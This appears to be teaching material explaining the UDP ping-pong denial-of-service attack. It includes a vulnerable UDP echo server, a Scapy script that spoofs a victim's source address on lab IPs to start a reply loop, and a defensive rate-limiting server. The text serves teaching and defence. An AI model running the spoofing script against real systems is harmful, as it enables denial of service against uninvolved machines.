The UDP Ping-Pong Attack is a type of denial-of-service (DoS) attack that exploits the connectionless nature of UDP: there is no handshake, so a receiver cannot verify that a packet's source address is genuine. The goal is to flood a target with traffic by tricking two machines into sending packets back and forth to each other.
The slides illustrate this attack with two Python code examples:
- The Server Code: This code sets up a simple UDP server that listens on a specific port. When it receives a packet, it prints the sender’s IP and port, and then sends a “Thank you” note back to the sender. This “thank you” note is the key to the attack.
- The Attack Code: This code is used to initiate the attack. It sends a single packet to the legitimate server but spoofs the source IP address. It sets the source IP to a different machine (the victim) and the destination IP to the server.
When the legitimate server receives this spoofed packet, it responds by sending a “Thank you” note, but since the source IP was spoofed, it sends this reply to the victim machine. The victim machine, if it is also a server, might respond in kind, sending a packet back to the original server. This creates a “ping-pong” loop where packets are bounced back and forth between the two machines, consuming their resources and potentially causing a denial of service for one or both of them.

UDP Ping-Pong Server Code:
#!/usr/bin/python3
import socket

IP = "0.0.0.0"
PORT = 9090

# Plain UDP socket bound to all interfaces on port 9090
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((IP, PORT))

while True:
    data, (ip, port) = sock.recvfrom(1024)
    print("Sender: {} and Port: {}".format(ip, port))
    print("Received message: {}".format(data))
    # Send back a "Thank you" note to whatever source address the packet claims
    sock.sendto(b'Thank you!', (ip, port))

UDP Ping-Pong Attack Code:
#!/usr/bin/python3
from scapy.all import *

print("Triggering UDP Ping Pong ...")
# Source IP is spoofed as the victim; destination is the server
ip = IP(src="10.0.2.6", dst="10.0.2.7")
udp = UDP(sport=9090, dport=9090)
data = "Let the Ping Pong game start!\n"
pkt = ip/udp/data
send(pkt, verbose=0)
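
A defensive counterpart to the server listing above, as an added example that is not part of the original slides: the server declines to answer datagrams whose source port is its own service port or a privileged port, and caps replies per source, so a reflected "Thank you" cannot sustain a loop. The ReplyGuard class and its max_replies and window parameters are hypothetical names chosen here; the low-port rule assumes legitimate clients send from ephemeral ports.

```python
#!/usr/bin/python3
# Added example (not from the original slides): reply policy for the echo-style
# server above. ReplyGuard, max_replies and window are hypothetical names.
import socket
import time

SERVICE_PORT = 9090  # same port as the server listing above


class ReplyGuard:
    """Decide whether a received datagram may be answered."""

    def __init__(self, service_port, max_replies=5, window=1.0):
        self.service_port = service_port
        self.max_replies = max_replies   # replies allowed per source per window
        self.window = window             # window length in seconds
        self.history = {}                # (ip, port) -> recent reply timestamps

    def allow(self, ip, port, now):
        # A client normally sends from an ephemeral port. A source port equal
        # to our own service port (or any privileged port) suggests the peer
        # is itself a server, so a reply could start a ping-pong loop.
        if port == self.service_port or port < 1024:
            return False
        # Cap replies per source so any loop that slips through dies quickly.
        recent = [t for t in self.history.get((ip, port), []) if now - t < self.window]
        if len(recent) >= self.max_replies:
            self.history[(ip, port)] = recent
            return False
        recent.append(now)
        self.history[(ip, port)] = recent
        return True


def serve(ip="0.0.0.0", port=SERVICE_PORT):
    guard = ReplyGuard(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((ip, port))
    while True:
        data, (src_ip, src_port) = sock.recvfrom(1024)
        if guard.allow(src_ip, src_port, time.monotonic()):
            sock.sendto(b"Thank you!", (src_ip, src_port))
        else:
            print("Dropped reply to {}:{}".format(src_ip, src_port))


if __name__ == "__main__":
    serve()
```

The guard only limits what this server contributes to a loop; the spoofed source address itself has to be stopped by source-address filtering at the network edge.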